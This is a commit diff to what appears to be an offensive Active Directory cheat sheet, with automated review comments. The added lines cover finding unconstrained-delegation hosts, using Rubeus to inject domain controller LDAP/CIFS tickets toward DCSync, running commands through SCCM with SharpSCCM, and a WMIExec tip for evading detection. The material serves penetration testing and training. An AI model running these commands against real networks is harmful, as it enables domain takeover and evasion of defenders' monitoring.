WMIExec + SharpSCCM

This commit is contained in:
Swissky 2023-02-15 12:33:20 +01:00
parent 36e135776f
commit ae46ac0338
2 changed files with 22 additions and 2 deletions


@ -3422,6 +3422,9 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma
:warning: Unconstrained delegation used to be the only option available in Windows 2000 :warning: Unconstrained delegation used to be the only option available in Windows 2000
> **Warning**
> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket
#### SpoolService Abuse with Unconstrained Delegation #### SpoolService Abuse with Unconstrained Delegation
The goal is to gain DC Sync privileges using a computer account and the SpoolService bug. The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.
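Review bot: the new `> **Warning**` callout sits directly under a line that uses the `:warning:` emoji convention (the same style is used for the delegation note later in this diff), so the section now mixes two warning styles; either convert the Windows 2000 note to the same callout block or keep the emoji form for this one. The advice would also be more actionable with its reason and a concrete form, e.g. "coerce the victim to the unconstrained-delegation host's DNS name (FQDN), not its IP address: a hostname lets the coerced machine obtain a Kerberos service ticket, an IP address makes it fall back to NTLM authentication, which yields no TGT."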
@ -3436,7 +3439,7 @@ The goal is to gain DC Sync privileges using a computer account and the SpoolSer
##### Find delegation ##### Find delegation
:warning: : Domain controllers usually have unconstrained delegation enabled. :warning: : Domain controllers usually have unconstrained delegation enabled.
Check the `TrustedForDelegation` property. Check the `TRUSTED_FOR_DELEGATION` property.
* [ADModule](https://github.com/samratashok/ADModule) * [ADModule](https://github.com/samratashok/ADModule)
```powershell ```powershell
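Review bot: the rename to `TRUSTED_FOR_DELEGATION` on the "Check the ... property" line is only half right: `TRUSTED_FOR_DELEGATION` is the name of the userAccountControl flag, whereas the ADModule bullet that immediately follows exposes it as the `TrustedForDelegation` attribute of `Get-ADComputer`/`Get-ADUser`, which is what the old text referred to. Suggest wording that names both, e.g. `Check the TrustedForDelegation property (the TRUSTED_FOR_DELEGATION bit of userAccountControl).`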
@ -3455,6 +3458,9 @@ Check the `TrustedForDelegation` property.
cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation
``` ```
* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c`
* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl`
##### SpoolService status ##### SpoolService status
Check if the spool service is running on the remote host Check if the spool service is running on the remote host
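Review bot: the "Powershell Active Directory module" bullet duplicates the tool already listed in the ADModule bullet of this section (ADModule is the same `Get-ADComputer` cmdlet, just loaded without RSAT), so the one-liner would read better folded into that bullet than as a separate entry. Independently of placement, the LDAP filter is opaque as written; add a short note that `1.2.840.113556.1.4.803` is the bitwise-AND matching rule and `524288` is `0x80000`, the `TRUSTED_FOR_DELEGATION` bit of `userAccountControl`, so readers can see it asks the same question as the BloodHound `unconstraineddelegation:true` query and the `--trusted-for-delegation` CrackMapExec flag above it.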
@ -3499,7 +3505,7 @@ If the attack worked you should get a TGT of the domain controller.
Extract the base64 TGT from Rubeus output and load it to our current session. Extract the base64 TGT from Rubeus output and load it to our current session.
```powershell ```powershell
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt .\Rubeus.exe asktgs /ticket:<ticket base64> /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt
``` ```
Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets` Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets`
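Review bot: the sentence above the fence still says "load it to our current session", but the command was changed from a plain `/ptt` of the TGT to `asktgs` with `/service:LDAP/dc.lab.local,cifs/dc.lab.local`, which requests service tickets for LDAP and CIFS from that TGT and injects those; either update the sentence to say so (LDAP is the one needed for the DCSync goal stated at the top of this section, CIFS is a convenience), or keep the simpler `/ptt` form. Also mark `dc.lab.local` as a placeholder (e.g. `<dc_fqdn>`) in the same style as `<ticket base64>`, and use one casing for the SPN service class (`LDAP/` vs `cifs/`).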
@ -3768,6 +3774,13 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM) * [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM) * [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
* Using **SharpSCCM**
```ps1
.\SharpSCCM.exe get device --server <SERVER8NAME> --site-code <SITE_CODE>
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
```
* Compromise client, use locate to find management server * Compromise client, use locate to find management server
```ps1 ```ps1
MalSCCM.exe locate MalSCCM.exe locate
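Review bot: `<SERVER8NAME>` on the first SharpSCCM line looks like a typo for `<SERVER_NAME>`, and the three lines use three different argument conventions (`--server`/`--site-code` named options, then positional `<server> <sitecode>`, then neither) with `-r <relay_server_ip>`, `-s` and `--debug` left unexplained; pick the syntax of the SharpSCCM version being documented and prefix each line with a one-line comment saying what it does (enumerate devices for a site, execute via the relay server, run a command on `WS01`), as the MalSCCM bullet right below does with "use locate to find management server". The entry also lacks the repository link that the PowerSCCM and MalSCCM bullets carry.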
@ -3838,6 +3851,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
ConvertFrom-SddlString "" ConvertFrom-SddlString ""
``` ```
### SCCM Shares ### SCCM Shares
> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares > Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
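Review bot: the new `### SCCM Shares` heading is inserted directly above a blockquote that was previously part of the preceding SCCM material; check that the heading level is consistent with its siblings in this part of the file (the delegation subsections earlier in this diff use `####` and `#####`), and that the file's table of contents gets a matching anchor entry, as was done for the `WMIExec` heading in the second file of this commit.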


@ -10,6 +10,7 @@
* [Crackmapexec](#crackmapexec) * [Crackmapexec](#crackmapexec)
* [Impacket](#impacket) * [Impacket](#impacket)
* [PSExec](#psexec) * [PSExec](#psexec)
* [WMIExec](#wmiexec)
* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) * [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol)
* [Powershell Remoting Protocol](#powershell-remoting-protocol) * [Powershell Remoting Protocol](#powershell-remoting-protocol)
@ -162,6 +163,11 @@ Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCu
You need to update the pipe name to match "Custom_communication" in the line 163 You need to update the pipe name to match "Custom_communication" in the line 163
`fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)` `fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f)`
### WMIExec
Use a non default share `-share SHARE` to write the output to reduce the detection.
By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1`
## RDP Remote Desktop Protocol ## RDP Remote Desktop Protocol
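Review bot: the new WMIExec section never says which tool the `-share SHARE` option belongs to; from the surrounding Impacket and PSExec sections it is presumably Impacket's `wmiexec.py`, so name it and give a full invocation such as `wmiexec.py -share <SHARE> domain/user:password@target`. The quoted default `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1` is one concrete instance (`cd` is just the first command the semi-interactive shell sends), so describe the pattern as `cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<suffix> 2>&1` and use the `<...>` placeholder style the file uses elsewhere. "reduce the detection" should read "reduce detection", and it is worth adding the caveat that changing the share only moves the output file: the WMI process creation (`cmd.exe` spawned by `WmiPrvSE.exe`) and the SMB read of that file are unchanged and still visible to endpoint telemetry.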